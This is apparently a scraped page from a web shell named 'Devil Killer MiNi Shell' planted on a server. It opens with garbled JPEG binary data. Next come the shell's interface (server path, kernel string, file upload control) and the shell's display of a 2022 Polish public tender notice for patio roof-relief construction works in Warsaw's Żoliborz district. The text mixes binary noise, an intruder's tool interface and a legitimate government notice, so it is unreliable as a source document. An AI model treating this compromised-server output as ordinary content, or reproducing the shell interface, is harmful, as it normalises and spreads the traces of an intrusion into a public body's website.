JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220607/0019842701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie robót, polegających na odciążeniu stropu patio w budynku przy ul. Marii Kazimiery 18-26 z mas ziemnych oraz elementów betonowych prefabrykowanych, wraz z robotami towarzyszącymi. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">&#34;ZAKŁAD GOSPODAROWANIA NIERUCHOMOŚCIAMI W DZIELNICY ŻOLIBORZ M.ST. WARSZAWY&#34;</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011104337</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Marii Kazimiery 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-641</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pgrochot@zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zgnzoliborz.waw.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie robót, polegających na odciążeniu stropu patio w budynku przy ul. Marii Kazimiery 18-26 z mas ziemnych oraz elementów betonowych prefabrykowanych, wraz z robotami towarzyszącymi. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1bb03d0c-e666-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00198427</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00022447/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Modernizacja budynków mieszkalnych przy ul. Marii Kazimiery 18/26, Mickiewicza 65 - prace przygotowawcze</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zgnzoliborz.ezamawiajacy.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się drogą elektroniczną przy użyciu Platformy eZamawiający https://zgnzoliborz.ezamawiajacy.pl/ oraz<br/>poczty elektronicznej.2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie<br/>zamówienia publicznego, musi posiadać konto na Platformie eZamawiający. Wykonawca posiadający<br/>konto na Platformie eZamawiający ma dostęp do formularzy: złożenia, zmiany i wycofania oferty oraz<br/>do formularza do komunikacji. 3. Wymagania techniczne i organizacyjne wysyłania i odbierania<br/>dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji przekazywanych<br/>przy ich użyciu zostały opisane na Platformie eZamawiający. 4. Wykonawca przystępując do<br/>niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje warunki korzystania z<br/>Platformy eZamawiający oraz zobowiązuje się korzystając z Platformy eZamawiający przestrzegać<br/>postanowień opisanych na platformie. 5. Maksymalny rozmiar plików przesyłanych za pośrednictwem<br/>dedykowanych formularzy do: złożenia, zmiany i wycofania oferty oraz do komunikacji wynosi 150 MB.<br/>6. Za datę przekazania dokumentów elektronicznych, cyfrowych odwzorowań dokumentów oraz innych<br/>informacji przyjmuje się datę ich przekazania na Platformie eZamawiający, a w przypadku<br/>przekazywania tych dokumentów oraz informacji za pomocą poczty elektronicznej - datą ich przesłania<br/>będzie potwierdzenie dostarczenia wiadomości zawierającej dokument/informację z serwera<br/>pocztowego Zamawiającego.7. Zamawiający przekazuje link do postępowania<br/>https://zgnzoliborz.ezamawiajacy.pl/ oraz Numer postępowania ZGN/PZP/11/2022 jako załącznik do<br/>niniejszej SWZ. Dane postępowanie można wyszukać również na Liście przetargów PZP, przetargi<br/>„Aktualne” klikając wcześniej opcję „Dla Wykonawców”.8. W postępowaniu o udzielenie zamówienia<br/>komunikacja pomiędzy Zamawiającym a Wykonawcami w szczególności składanie dokumentów<br/>elektronicznych (innych niż oferta oraz załączniki do oferty), cyfrowych odwzorowań dokumentów oraz<br/>przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza<br/>dostępnego na Platformie eZamawiający. We wszelkiej korespondencji związanej z niniejszym postępowaniem Zamawiający i Wykonawcy posługują się numerem ogłoszenia (BZP).<br/>Zamawiający może również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>pgrochot@zgnzoliborz.waw.pl9. Dokumenty elektroniczne (inne niż oferta oraz załączniki do oferty)<br/>oraz cyfrowe odwzorowania dokumentów składane są przez Wykonawcę za pośrednictwem<br/>Formularza do komunikacji jako załączniki. Zamawiający dopuszcza również możliwość składania ww.<br/>dokumentów elektronicznych oraz cyfrowych odwzorowań dokumentów za pomocą poczty<br/>elektronicznej, na adres email pgrochot@zgnzoliborz.waw.pl 10. Sposób sporządzenia dokumentów<br/>elektronicznych, cyfrowych odwzorowań dokumentów oraz informacji musi być zgody z wymaganiami<br/>określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów<br/>elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie (Dz. U. z 2020 r., poz. 2452). 11. Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej,<br/>wskazanych w SWZ.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://zgnzoliborz.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna<br/>dotyczącaprzetwarzaniadanychosobowych 1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia<br/>ParlamentuEuropejskiego i Rady(UE)2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób<br/>fizycznych wzwiązku zprzetwarzaniemdanych osobowych i w sprawie swobodnego przepływu takich<br/>danych orazuchyleniadyrektywy95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str.1), dalej„RODO”, informuję, że: • administratorem Pani/Pana danych osobowych<br/>jestZakładGospodarowaniaNieruchomościami w Dzielnicy Żoliborz m.st. Warszawy ul. Marii Kazimiery<br/>1,01-641Warszawa; • wsprawach związanych z Pani/Pana danymi proszę kontaktować się<br/>zInspektoremOchrony Danych,kontakt pisemny za pomocą poczty elektronicznej na adres<br/>email:iod@zgnzoliborz.waw.pl; •Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust.<br/>1lit. cRODO w celuprowadzenia przedmiotowego postępowania o udzielenie zamówienia<br/>publicznegoorazzawarciaumowy, a podstawą prawną ich przetwarzania jest obowiązek<br/>prawnystosowaniasformalizowanychprocedur udzielania zamówień publicznych spoczywający<br/>naZamawiającym; •odbiorcami Pani/Panadanych osobowych będą osoby lub podmioty,<br/>którymudostępniona zostaniedokumentacjapostępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>•Pani/Pana dane osobowebędąprzechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>latod dniazakończeniapostępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza<br/>4lata,okresprzechowywania obejmuje cały czas trwania umowy; • obowiązek podania<br/>przezPanią/Panadanychosobowych bezpośrednio Pani/Pana dotyczących jest wymogiem<br/>ustawowymokreślonymwprzepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzieleniezamówieniapublicznego;konsekwencje niepodania określonych danych wynikają z ustawy<br/>Pzp; • wodniesieniu doPani/Panadanych osobowych decyzje nie będą podejmowane w<br/>sposóbzautomatyzowany, stosowaniedo art. 22RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani: − na podstawie art.<br/>15RODOprawodostępu do danych osobowych Pani/Pana dotyczących; − na podstawie art. 16<br/>RODO prawo do sprostowania lub uzupełnienia Pani/Pana danych osobowych, przy czym skorzystanie z prawa do sprostowania lub<br/>uzupełnienia nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz jego załączników. − na<br/>podstawie art.18RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w<br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego, a także nie ogranicza przetwarzania danych osobowych do czasu<br/>zakończenia postępowania o udzielenie zamówienia. −prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana<br/>dotyczących narusza przepisy RODO; • nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d<br/>lub<br/>e RODO prawo do usunięcia danych osobowych; −prawo do przenoszenia danych osobowych, o<br/>którym mowa w art. 20 RODO; − na podstawie art. 21RODO prawo sprzeciwu, wobec przetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.<br/>1<br/>lit. cRODO.2.JednocześnieZamawiający przypomina o ciążącym na Pani/Panu<br/>obowiązku informacyjnym wynikającym z art. 14RODO względem osób fizycznych, których dane<br/>przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający<br/>pośrednio pozyska od wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co<br/>najmniej jedno z wyłączeń, o których mowa w art. 14ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZGN/PZP/11/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 502798,54 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie robót, polegających na odciążeniu stropu patio w budynku przy ul. Marii Kazimiery<br/>18-26 z mas ziemnych oraz elementów betonowych prefabrykowanych, wraz z robotami towarzyszącymi.<br/>Zakres robót budowlanych przewidzianych do wykonania obejmuje m. in.:<br/>stemplowanie wszystkich stropów garaży podziemnych,<br/>demontaż zabawek z dwóch placów zabaw oraz elementów małej architektury,<br/>transport zdemontowanych elementów we wskazane miejsce w obrębie budynku,<br/>demontaż murków oporowych z elementów betonowych prefabrykowanych,<br/>karczowanie drzew wraz z usunięciem karpiny z wywozem,<br/>rozbiórka obrzeży oraz ażurowych płyt betonowych wraz ze zdjęciem urobku w celu odkrycia stropu z wymianą warstw<br/>izolacyjnych oraz odtworzeniem warstw rozsączających do wysokości chodnika,<br/>zdjęcie i wywóz wszystkich warstw ziemnych powyżej wysokości chodnika (odciążenie),<br/>odkrycie i wymiana dylatacji wraz z uszczelnieniem, odtworzenie podbudowy z keramzytu i wyścielenie urobku do<br/>wysokości chodnika,<br/>wykonanie ław oporowych, zabezpieczających kostkę po usunięciu prefabrykatów </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45211000-9 - Roboty budowlane w zakresie budownictwa wielorodzinnego i domów jednorodzinnych</p> <p class="mb-0">45223310-2 - Roboty budowlane w zakresie parkingów podziemnych</p> <p class="mb-0">45236000-0 - Wyrównywanie terenu</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia określonego w niniejszej SWZ mogą ubiegać się wykonawcy, którzy spełniają następujące<br/>warunki udziału w postępowaniu określone przez zamawiającego, dotyczące:<br/>1) nie podlegają wykluczeniu na podstawie art. 108 ust.1<br/>2) zdolności do występowania w obrocie gospodarczym tzn.<br/>są wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce<br/>zamieszkania, co w przypadku wykonawców mających siedzibę na terenie Rzeczypospolitej Polskiej (RP) oznacza, że są<br/>wpisani do Krajowego Rejestru Sądowego lub Centralnej Ewidencji i Informacji o Działalności Gospodarczej<br/>3) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>tzn.:<br/>Zamawiający nie stawia warunku w tym zakresie<br/>4) sytuacji ekonomicznej lub finansowej tzn.<br/>W celu wykazania spełnienia warunku posiadania sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia Wykonawca winien wykazać się posiadaniem dokumentu potwierdzającego, że wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości sumy<br/>gwarancyjnej nie mniejszej niż 400 000,00 zł;<br/>5) zdolności technicznej lub zawodowej tzn.<br/>Wykonawca spełni warunek jeżeli wykaże, że<br/>- jedną osobę posiadającą uprawnienia kierownika budowy w branży konstrukcyjno-budowlanej oraz jedną osobę<br/>posiadającą uprawnienia budowlane w branży drogowej;<br/>- posiada doświadczenie w realizacji co najmniej dwóch robót budowlanych o wartości nie mniejszej niż 400 000,00 zł brutto<br/>(każda). Wykonawca może wykazać się realizacją zamówień z okresu ostatnich pięciu lat przed upływem terminu składania<br/>ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">wykazu<br/>robót, o których mowa w części VI ust. 1 pkt 5 tiret 2 SWZ (wg<br/>wzoru stanowiącego załącznik do materiałów postępowania) wykonanych w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie – wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów na rzecz<br/>których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane<br/>zostały wykonane należycie przy czym dowodami, o których mowa, są referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne<br/>odpowiednie dokumenty. Do wykazu robót Wykonawca powinien dołączyć informację, czy roboty<br/>wymienione w wykazie robót wykonał sam czy potwierdzają wiedzę i doświadczenie innego podmiotu,<br/>którego zobowiązanie do udostępnienia wiedzy i doświadczenia winien załączyć wraz ze zobowiązaniem do jego udziału w<br/>wykonaniu części zamówienia;<br/>c) wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, o których<br/>mowa w części VI ust. 1 pkt 5 tiret 1 SWZ, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a<br/>także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami (wg wzoru stanowiącego załącznik do materiałów postępowania). W przypadku, gdy<br/>Wykonawca polega na osobach zdolnych do wykonania zamówienia innych podmiotów niezależnie od<br/>charakteru łączących go z nimi stosunków, do wykazu załącza pisemne zobowiązanie innych<br/>podmiotów do oddania Wykonawcy, do dyspozycji niezbędnych osób na okres korzystania z nich przy<br/>wykonaniu zamówienia).<br/>d) dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w<br/>zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną<br/>określoną przez zamawiającego w części VI ust. 1 pkt 4 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o<br/>niepodleganiu wykluczeniu, spełnianiu warunków udziału w<br/>postępowaniu składane<br/>wraz z ofertą pod rygorem nieważności, w formie elektronicznej.<br/>1) Do oferty wykonawca dołącza oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków<br/>udziału w postępowaniu, w zakresie wskazanym przez zamawiającego w pkt. VI, XV SWZ</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, art. 58 pzp W przypadku<br/>wykonawców wspólnie ubiegających się o udzielenie zamówienia, Wykonawcy ustanawiają<br/>pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Wykonawcy wspólnie ubiegający się o udzielenie 